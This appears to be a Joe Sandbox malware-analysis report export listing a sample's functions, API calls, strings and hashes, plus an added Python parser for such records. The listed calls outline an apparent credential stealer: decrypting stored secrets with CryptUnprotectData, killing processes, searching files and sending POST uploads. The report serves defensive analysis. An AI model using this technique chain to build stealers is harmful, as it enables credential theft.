• Instruction ID: 56b72ebae3c7d1e4cf2abd8dbced5e63e63d47f5259aef7bb8bdc76b0c2c14ad
• Opcode Fuzzy Hash: c41097598d98846a03815615bf176bae513b03423ccf49468bbc2743a67f6f66
• Instruction Fuzzy Hash: D5330671A102148FDB1EDF24CC95FAEB771BF45301F108698E8096B6A2DB749AC9CF51
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetTempPathA.KERNEL32(00000104,?,?,00000000), ref: 00356588
  • Part of subcall function 00356F10: Concurrency::cancel_current_task.LIBCPMT ref: 00356FE5
  • Part of subcall function 00356F10: lstrlenA.KERNEL32(00000000), ref: 00357272
  • Part of subcall function 00356F10: GetProcessHeap.KERNEL32 ref: 003572B6
  • Part of subcall function 00356F10: HeapAlloc.KERNEL32(00000000,00000008,?), ref: 003572C0
  • Part of subcall function 00356F10: CryptUnprotectData.CRYPT32 ref: 00357349
  • Part of subcall function 00356F10: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00357352
  • Part of subcall function 00356F10: HeapFree.KERNEL32(00000000), ref: 00357359
Strings
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: Heap$Process$AllocConcurrency::cancel_current_taskCryptDataFreePathTempUnprotectlstrlen
• String ID: --------$($/?#$Content-Type: application/octet-stream; boundary=----$POST$[%:$xz:$xz:$xz:
• API String ID: 4232048245-4086417300
• Opcode ID: 4c528e056a105c1a3934becf352db6a80d86feb09fa1ca8314d012994fd61fb5
• Instruction ID: 440a4385b0c4562c95628ea467cb89f35166902c4f7ac21c121e11a7bee09f6a
• Opcode Fuzzy Hash: 4c528e056a105c1a3934becf352db6a80d86feb09fa1ca8314d012994fd61fb5
• Instruction Fuzzy Hash: C6A1F670A003009BD70AFF34C856BAE77A4BF56309F50464CF8455F2A2EB75E68A87D2
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 00356F10: Concurrency::cancel_current_task.LIBCPMT ref: 00356FE5
• GetNativeSystemInfo.KERNELBASE(?), ref: 0036C761
• KiUserCallbackDispatcher.NTDLL ref: 0036C792
  • Part of subcall function 00356F10: lstrlenA.KERNEL32(00000000), ref: 00357272
  • Part of subcall function 00356F10: GetProcessHeap.KERNEL32 ref: 003572B6
  • Part of subcall function 00356F10: HeapAlloc.KERNEL32(00000000,00000008,?), ref: 003572C0
  • Part of subcall function 00356F10: CryptUnprotectData.CRYPT32 ref: 00357349
  • Part of subcall function 00356F10: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00357352
  • Part of subcall function 00356F10: HeapFree.KERNEL32(00000000), ref: 00357359
• Sleep.KERNEL32(00000BB8,?,00000000,?,?), ref: 0036D3BB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: Heap$Process$AllocCallbackConcurrency::cancel_current_taskCryptDataDispatcherFreeInfoNativeSleepSystemUnprotectUserlstrlen
• String ID: .txt$/Up$1715006195$MyApp/1.0$ref.txt$x86
• API String ID: 2845703258-3094677209
• Opcode ID: 72f8df371f51f09986265fe1445c26167311bfe32a1bd21ba786306e3f2890d6
• Instruction ID: 5ded90c274c6335b42a354fbb17c1c4b2ee55a3d231335c122af90771d3592eb
• Opcode Fuzzy Hash: 72f8df371f51f09986265fe1445c26167311bfe32a1bd21ba786306e3f2890d6
• Instruction Fuzzy Hash: 70A21770A143808BD72ADF34C855BEFB7E1AFD5304F148A1CF4894B6A2DB75A585CB82
Uniqueness
• Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID:
• String ID: /Up/$MyApp/1.0$unknown
• API String ID: 0-3989902347
• Opcode ID: 3b47771956d4ce77dbae7ca87bce5592793b3a23f281eab134c9360bc1ac2f2d
• Instruction ID: a46fa34dce60cbfcbe4474bada33462811fb24b647fe4430717e4aa5403f0017
• Opcode Fuzzy Hash: 3b47771956d4ce77dbae7ca87bce5592793b3a23f281eab134c9360bc1ac2f2d
• Instruction Fuzzy Hash: 14E2C5715183808FE73ADF28C895BAFB7E1BFC5314F148A1CE48D5B2A1DB7895858B42
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
APIs
  • Part of subcall function 00373990: std::locale::_Init.LIBCPMT ref: 003739F9
• NtCreateFile.NTDLL ref: 00373D3F
• GetProcessHeap.KERNEL32(?,?,?), ref: 00373D5F
• RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 00373D69
• NtReadFile.NTDLL ref: 00373D9B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: FileHeap$AllocateCreateInitProcessReadstd::locale::_
• String ID: :p5$@$Kernel32.dll$ntdll.dll
• API String ID: 2125253174-4168157494
• Opcode ID: 7cbc073d39940dce6c33a97dc180a86ff72f6ba45d3d18fb2e5dc0cd1b52195c
• Instruction ID: 33f8d3c9d42ef2d6af014c06d797d7b2c0720253e7b53b131c869c5bc8fe17ed
• Opcode Fuzzy Hash: 7cbc073d39940dce6c33a97dc180a86ff72f6ba45d3d18fb2e5dc0cd1b52195c
• Instruction Fuzzy Hash: 8E61A371E002089BDF26DFA4DC85BEEB7B9EF49310F108219F505BB290DB38AA45CB54
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
APIs
• FindFirstFileA.KERNELBASE ref: 0035D0B2
• FindNextFileA.KERNELBASE(?,?), ref: 0035D519
• Sleep.KERNEL32(00000BB8,?,00000000,?,?), ref: 0035D724
Strings
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: FileFind$FirstNextSleep
• String ID: /Up/b$@$MyApp/1.0$ntdll.dll
• API String ID: 2635277345-838716244
• Opcode ID: 47645c5f7ea5cf50fe835b9c1ddddd7ae83a723e5e3cd36bc5298ccea93c9855
• Instruction ID: 8d7afd45cd06e5370368e9b50ae1fb5210511040f85c9f4870497adb15e55293
• Opcode Fuzzy Hash: 47645c5f7ea5cf50fe835b9c1ddddd7ae83a723e5e3cd36bc5298ccea93c9855
• Instruction Fuzzy Hash: E532F4715083808FD72ADF24C845F6FB7E1BF85305F148A1CF8858B6A2EB75D5898B92
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00374203
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 00374223
• OpenProcess.KERNEL32(00000001,00000000,?,?,?,?), ref: 00374377
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?), ref: 00374386
• CloseHandle.KERNEL32(00000000,?,?,?), ref: 0037438D
• Process32NextW.KERNEL32(?,0000022C), ref: 003743A1
• CloseHandle.KERNEL32(00000000), ref: 003743B7
• Sleep.KERNELBASE(000003E8), ref: 003743C2
  • Part of subcall function 00373990: std::locale::_Init.LIBCPMT ref: 003739F9
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: CloseHandleProcessProcess32$CreateFirstInitNextOpenSleepSnapshotTerminateToolhelp32std::locale::_
• String ID:
• API String ID: 2916365046-0
• Opcode ID: 439b53793e0593b63cb513bec675a7da5446332a024882476641b8efd92a6ee9
• Instruction ID: 4a2cc428a2a59c132ca01f153c16b811626db4d748539177df75c6c7b3cfae23
• Opcode Fuzzy Hash: 439b53793e0593b63cb513bec675a7da5446332a024882476641b8efd92a6ee9
• Instruction Fuzzy Hash: 8F51D3359052288BDB369F24DCCDBADB778EB44301F1085D9E90EA7291D739AE94CF50
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph of the function at 36f560 (graph image not reproduced; basic blocks span 36f560-36f7f9 and call InternetOpenUrlA, Sleep and InternetReadFile, with a re-entrant call to 36f560 after the Sleep and subcalls to 374780, 374650, 374a11, 376ca0 and 35ff80).
APIs
  • Part of subcall function 00374780: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,?,?,?,00000000,811C9DC5,00000000), ref: 00374832
• InternetOpenUrlA.WININET ref: 0036F69D
• Sleep.KERNEL32(000007D0), ref: 0036F6B2
• InternetReadFile.WININET ref: 0036F707
• InternetReadFile.WININET ref: 0036F79C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: Internet$FileRead$ByteCharMultiOpenSleepWide
• String ID: Kernel32.dll$Wininet.dll
• API String ID: 4155548564-3787353695
• Opcode ID: 231bcdb5fb10feb4ca5710f31c17539302797a9d827b6743bbc4acb68bc57c82
• Instruction ID: 23fb4c93c6a498fd0444a917d2c9c0e0b1be4847d9feeef41f3681e01c63cd98
• Opcode Fuzzy Hash: 231bcdb5fb10feb4ca5710f31c17539302797a9d827b6743bbc4acb68bc57c82
• Instruction Fuzzy Hash: AB7175B5A011289FCB21DF24CC85B9DB7B8EF48310F4041EAE609B7251DB70AE85CF98
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNELBASE ref: 00357C0B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: AttributesFile
• String ID: \Ext\$inc
• API String ID: 3188754299-3864405785
• Opcode ID: a8b21051f99f12663e274a7a79f75234485b5f6902037e07aed83f927b39ba70
• Instruction ID: 06c4e1d3d5aa37cefd915bc6bc13c53115e9bb3b49530665d8a85496ead3502d
• Opcode Fuzzy Hash: a8b21051f99f12663e274a7a79f75234485b5f6902037e07aed83f927b39ba70
• Instruction Fuzzy Hash: DFF2D6719102148FDB1EDF24CC99FADB772BF45301F148699E8096B6B2DB749AC98F40
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetFileAttributesA.KERNELBASE ref: 00357C0B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: AttributesFile
• String ID: \Ext\$inc
• API String ID: 3188754299-3864405785
• Opcode ID: 151b9157c63f50dd6448af1184d540cbb18a77d35e03b49ed1164a1405820dda
• Instruction ID: 015f72206ef77bc42f323c2c075f7bce1db4ca6fb13059c4d2cd765298a3fd3d
• Opcode Fuzzy Hash: 151b9157c63f50dd6448af1184d540cbb18a77d35e03b49ed1164a1405820dda
• Instruction Fuzzy Hash: 82F2D571A102148FDB1EDF24CC99FADB772BF45301F148699E8096B6B2DB749AC98F40
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

Control-flow graph of the function at 387a30 (graph image not reproduced; basic blocks span 387a30-387e91 and call GetTimeZoneInformation, with subcalls including 387377, 38737d, 3873db, 387383, 380ff5, 387972, 38665c, 38524e, 38a818, 376750, 3879e9, 37f293, 384280, 387e92, 387cc2, 374a11 and a re-entrant call to 387a30).
APIs
• GetTimeZoneInformation.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00387E75,00000000,00000000,00000000), ref: 00387D34
Strings
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: InformationTimeZone
• String ID: W. Europe Standard Time$W. Europe Summer Time$u~8$}~8
• API String ID: 565725191-1817765445
• Opcode ID: 54f3291e7f34a366396db0787630bf5843adc170e0ea142cc7a901fdd8b25bf2
• Instruction ID: cac8c5e935a9df54b6b02a0e59e67790c6b22ab29bb5b605115c6156648fbac8
                                                                                                                                                                                            • Opcode Fuzzy Hash: 54f3291e7f34a366396db0787630bf5843adc170e0ea142cc7a901fdd8b25bf2
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0CC12572904311ABDB27BB64DC42ABE77BAEF04750F2540A6F901EB291EB70DE40D790
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

Control-flow Graph
• Rendered graph not preserved in the text export; the executed/not-executed colouring is lost. Entry block 3648b3, last block 3657bf-365809. The function contains no Windows API call sites; its internal calls go to 366fc0, 368f50, 3619f0, 356f10, 3612d0, 364590, 3617f0, 361d70, 366610, 35edc0, 356470, 37b1dd, 361990, 374a11 and 3666e0.
Strings
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID:
• String ID: array$object$object key$object separator
• API String ID: 0-2277530871
• Opcode ID: b92b8ad7224a4335977c17e5c1221d04afa4593d451359ed47203ffd71e1d8ff
• Instruction ID: 7ac756d5a10d66171ab14d7221afe25d0cffc25b06c5530be82e21ce5fc8f168
• Opcode Fuzzy Hash: b92b8ad7224a4335977c17e5c1221d04afa4593d451359ed47203ffd71e1d8ff
• Instruction Fuzzy Hash: 1512C4705187859FD32ADF24C851BAAB7F8BF85300F408A2DF586C7595EB70E644CB92
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8fa6bcf462dfe101e1eee8081a6e4d369413400781b65f1a12225bf0fe7639ae
• Instruction ID: 3530133dad9da70c22d5e75e91a037eb711af09fdc3ae58dccd99d9f76481fd2
• Opcode Fuzzy Hash: 8fa6bcf462dfe101e1eee8081a6e4d369413400781b65f1a12225bf0fe7639ae
• Instruction Fuzzy Hash: 9182B3315183808FE73EDF28C895BEFB7E1BF85304F148A1DE4895B6A1DB7895858B42
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindFirstFileA.KERNELBASE ref: 0037023D
• PathMatchSpecA.SHLWAPI(?,?), ref: 0037033D
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: FileFindFirstMatchPathSpec
• String ID:
• API String ID: 1021465796-0
• Opcode ID: c2fa82ba05be4062dc3c8764b1f0d3452e4bb7a2d3cbc79b22f6fbb16bb8d2f6
• Instruction ID: 18dcc769bdddb8a73d52412f7ddc111a99fa08d48ec4f70c865f3015524b28e2
• Opcode Fuzzy Hash: c2fa82ba05be4062dc3c8764b1f0d3452e4bb7a2d3cbc79b22f6fbb16bb8d2f6
• Instruction Fuzzy Hash: DA42E471508380CBD73ACF28C8947ABB7E1BFC5314F148A5CE4999B2A2D775D985CB82
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
• Rendered graph not preserved in the text export; the executed/not-executed colouring is lost. Entry block 36b4b0, last block 36bcbb-36bcc0. LoadLibraryA is called from block 36b64d-36b686 and WideCharToMultiByte from block 36b8db-36b921; internal calls go to 356f10, 35e940, 374780, 37b1dd, 380fd8, 35fa30, 374650, 374ea2, 374a11, 368f50, 35ff80, 376750, 360220, 36eb70, 374ed3, 36f050 and 376ca0.
APIs
• LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0036B679
  • Part of subcall function 00356F10: Concurrency::cancel_current_task.LIBCPMT ref: 00356FE5
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,00000001,?,?,?,?,003A3D14,00000001), ref: 0036B8FB
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: ByteCharConcurrency::cancel_current_taskLibraryLoadMultiWide
• String ID:
• API String ID: 1730022097-0
• Opcode ID: 4fc5cbf6183f1f165b16da5200c135830c097e80932db5f47ca30336e4c517b9
• Instruction ID: 3770dbd927c79637d86d184d3ac05a465f9124143cfe645679b3aa188118a4bd
• Opcode Fuzzy Hash: 4fc5cbf6183f1f165b16da5200c135830c097e80932db5f47ca30336e4c517b9
• Instruction Fuzzy Hash: A332E631E102188BDB1ADF24CC95BEDB775FF4A304F148299E409AB295DB74AAC5CF90
Uniqueness
Uniqueness Score: -1.00%
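
Added example, not part of the Joe Sandbox report or of the analysed sample: a Python parser for per-function records in the plain-text shape shown above, so an analyst can pivot on API names, call-site RVAs and Instruction Fuzzy Hashes instead of re-reading the listing. The sample text is constructed from the GetTimeZoneInformation, FindFirstFileA/PathMatchSpecA and LoadLibraryA records on this page; the names SAMPLE_REPORT, parse_function_records, records_calling and rva are chosen here, and the layout is assumed to be the one rendered on this page (section headers on their own lines, one bulleted item per line, a record terminated by its Uniqueness Score line).

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: three records in the plain-text shape of the listing above
# (headers on their own lines, "•" items, a record ends at "Uniqueness Score").
SAMPLE_REPORT = """\
APIs
• GetTimeZoneInformation.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00387E75,00000000,00000000,00000000), ref: 00387D34
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
Similarity
• String ID: W. Europe Standard Time$W. Europe Summer Time$u~8$}~8
• Instruction Fuzzy Hash: 0CC12572904311ABDB27BB64DC42ABE77BAEF04750F2540A6F901EB291EB70DE40D790
Uniqueness
Uniqueness Score: -1.00%
APIs
• FindFirstFileA.KERNELBASE ref: 0037023D
• PathMatchSpecA.SHLWAPI(?,?), ref: 0037033D
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
Similarity
• Instruction Fuzzy Hash: DA42E471508380CBD73ACF28C8947ABB7E1BFC5314F148A5CE4999B2A2D775D985CB82
Uniqueness
Uniqueness Score: -1.00%
APIs
• LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0036B679
  • Part of subcall function 00356F10: Concurrency::cancel_current_task.LIBCPMT ref: 00356FE5
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,00000001,?,?,?,?,003A3D14,00000001), ref: 0036B8FB
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
Similarity
• API ID: ByteCharConcurrency::cancel_current_taskLibraryLoadMultiWide
• String ID:
• Instruction Fuzzy Hash: A332E631E102188BDB1ADF24CC95BEDB775FF4A304F148299E409AB295DB74AAC5CF90
Uniqueness
Uniqueness Score: -1.00%
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity", "Uniqueness"}
# "Name.MODULE(args), ref: ADDR"; both the argument list and the comma are optional.
API_RE = re.compile(r"^(?:•\s*)?(?P<name>[A-Za-z0-9_:]+)\.(?P<module>[A-Za-z0-9_]+)"
                    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SUBCALL_RE = re.compile(r"^•\s*Part of subcall function\s+(?P<caller>[0-9A-Fa-f]+):\s*(?P<rest>.+)$")
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+?):\s*(?P<value>.*)$")  # "• Key: value" lines

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                          # absolute call-site address in the dump
    subcall_of: Optional[int] = None  # caller address for "Part of subcall function"

@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)  # "String ID" split on "$"
    fields: Dict[str, str] = field(default_factory=dict)  # Memory Dump Source + Similarity
    uniqueness: Optional[float] = None

    def image_base(self) -> int:
        """The "Offset:" of the dump, i.e. the module base the sandbox saw in this run."""
        return int(re.search(r"Offset:\s*([0-9A-Fa-f]+)", self.fields["Source File"]).group(1), 16)

def parse_function_records(text: str) -> List[FunctionRecord]:
    """One FunctionRecord per "Uniqueness Score" terminator."""
    records: List[FunctionRecord] = []
    rec, section = FunctionRecord(), None
    for line in filter(None, map(str.strip, text.splitlines())):
        if line in SECTION_HEADERS:
            section = line
        elif line.startswith("Uniqueness Score:"):
            rec.uniqueness = float(line.split(":", 1)[1].strip().rstrip("%"))
            rec.strings = [s for s in rec.fields.get("String ID", "").split("$") if s]
            records.append(rec)
            rec, section = FunctionRecord(), None
        elif section == "APIs":
            caller, sub = None, SUBCALL_RE.match(line)
            if sub:  # nested item: keep the caller, parse the rest like any API line
                caller, line = int(sub.group("caller"), 16), sub.group("rest")
            if m := API_RE.match(line):
                args = [a for a in (m.group("args") or "").split(",") if a]
                rec.apis.append(ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16), caller))
        elif section in ("Memory Dump Source", "Similarity"):
            if m := KV_RE.match(line):
                rec.fields[m.group("key").strip()] = m.group("value").strip()
    return records

def records_calling(records: List[FunctionRecord], api_name: str) -> list:
    """(record index, ApiCall) for every call to api_name, subcalls included."""
    return [(i, c) for i, r in enumerate(records) for c in r.apis if c.name == api_name]

def rva(record: FunctionRecord, address: int) -> int:
    """Absolute address -> RVA: the value that stays stable across load bases and reruns."""
    return address - record.image_base()
```

The rva() helper subtracts the dump's Offset (00350000, the module base in this run) from the absolute ref: address. The absolute address changes with the load base on another run; the RVA and the Instruction Fuzzy Hash do not, so those are the values to carry into a hunting rule or to compare against a second report.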

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 419b73d1114cafdf75a183c171001977a78087d38d1c1d05a48007f4e2ee6705
• Instruction ID: 01ad8d3c90c4ceeaaec03aedf7c3d888dbbaec641c2f2e4da4fbef9203726440
